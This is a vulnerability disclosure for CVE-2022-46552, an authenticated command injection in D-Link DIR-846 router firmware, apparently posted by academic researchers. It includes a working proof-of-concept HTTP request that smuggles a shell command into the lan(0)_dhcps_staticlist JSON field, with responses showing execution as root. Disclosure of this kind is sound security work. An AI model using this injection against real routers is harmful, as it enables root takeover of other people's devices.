Skip to content
Permalink
main
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Go to file
 
 
Cannot retrieve contributors at this time

CVE-2022-46552: D-Link DIR-846 Wireless Router in firmware FW100A53DBR-Retail has vulnerability that leads to a RCE

1. Vulnerability Information

Authors: Françoa Taffarel Rosário Corrêa, Osmany Barros de Freitas and Lourenço Alves Pereira Junior.

Affiliation: Aeronautics Institute of Technology (ita.br)

Common Weakness Enumeration: CWE-78 - Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')

Vulnerability Description: D-Link DIR-846 Firmware FW100A53DBR was discovered to contain a remote command execution (RCE) vulnerability via the lan(0)_dhcps_staticlist parameter. This vulnerability is exploited via a crafted POST request.

The detail of vulnerability: The exploitation method corresponds to an injection command through a Authenticated user input with special characters. In this case, the file SetIpMacBindSettings.php (line 79) contains an exec function with a partially sanitized user input. Thus, an attacker can execute arbitrary commands by sending a maliciously crafted payload through a POST request. The HTTP message content is JSON-encoded and has the lan(0)_dhcps_staticlist key, a string with comma-separated values. Therefore, the attacker must insert the malicious payload in the second value, leading the web server in the D-Link DIR-846 to invoke exec(changename.sh $mac "$(malicious_payload_command)") on the host system.

Vendor of the product: D-LINK

Affected product: DIR-846

Affected Version: Firmware DIR846enFW100A53DBR-Retail

Vulnerability Score V3.1: 9.1 High AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

Dates info:

Vulnerability discover: 30/11/2022

First try contact with vendor: 01/12/2022

Request CVE ID (MITRE): 01/12/2022

Date Record Created (MITRE): 05/12/2022

First vendor response: 08/12/2022

CVE Assignment Team response: 10/01/2023

Second try contact with vendor: 01/12/2022

CVE published in the CVE List:

2. Proof of Concept

Exploit Title: D-Link DIR-846 - Remote Command Execution (RCE) vulnerability via the lan(0)_dhcps_staticlist parameter (Authenticated)

Google Dork: NA

Date: 30/01/2023

Exploit Author: Françoa Taffarel

Vendor Homepage: https://www.dlink.com.br/produto/roteador-dir-846-gigabit-wi-fi-ac1200/#suporte

Software Link: https://www.dlink.com.br/wp-content/uploads/2020/02/DIR846enFW100A53DBR-Retail.zip

Version: DIR846enFW100A53DBR-Retail

Tested on: D-LINK DIR-846

CVE: CVE-2022-46552

D-Link DIR-846 Firmware FW100A53DBR was discovered to contain a remote command execution (RCE) vulnerability via the lan(0)_dhcps_staticlist parameter. This vulnerability is exploited via a crafted POST request.

Malicious POST Request

POST /HNAP1/ HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:107.0) Gecko/20100101 Firefox/107.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
SOAPACTION: "http://purenetworks.com/HNAP1/SetIpMacBindSettings"
HNAP_AUTH: 0107E0F97B1ED75C649A875212467F1E 1669853009285
Content-Length: 171
Origin: http://192.168.0.1
Connection: close
Referer: http://192.168.0.1/AdvMacBindIp.html?t=1669852917775
Cookie: PHPSESSID=133b3942febf51641c4bf0d81548ac78; uid=idh0QaG7; PrivateKey=DBA9B02F550ECD20E7D754A131BE13DF; timeout=4

{"SetIpMacBindSettings":{"lan_unit":"0","lan(0)_dhcps_staticlist":"1,$(id>rce_confirmed),02:42:d6:f9:dc:4e,192.168.0.15"}}

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/7.1.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-type: text/html; charset=UTF-8
Connection: close
Date: Thu, 01 Dec 2022 11:03:54 GMT
Server: lighttpd/1.4.35
Content-Length: 68

{"SetIpMacBindSettingsResponse":{"SetIpMacBindSettingsResult":"OK"}}

Data from RCE Request

GET /HNAP1/rce_confirmed HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:107.0) Gecko/20100101 Firefox/107.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=133b3942febf51641c4bf0d81548ac78; uid=ljZlHjKV; PrivateKey=846232FD25AA8BEC8550EF6466B168D9; timeout=1
Upgrade-Insecure-Requests: 1

Response

HTTP/1.1 200 OK
Content-Type: application/octet-stream
Accept-Ranges: bytes
Content-Length: 24
Connection: close
Date: Thu, 01 Dec 2022 23:24:28 GMT
Server: lighttpd/1.4.35

uid=0(root) gid=0(root)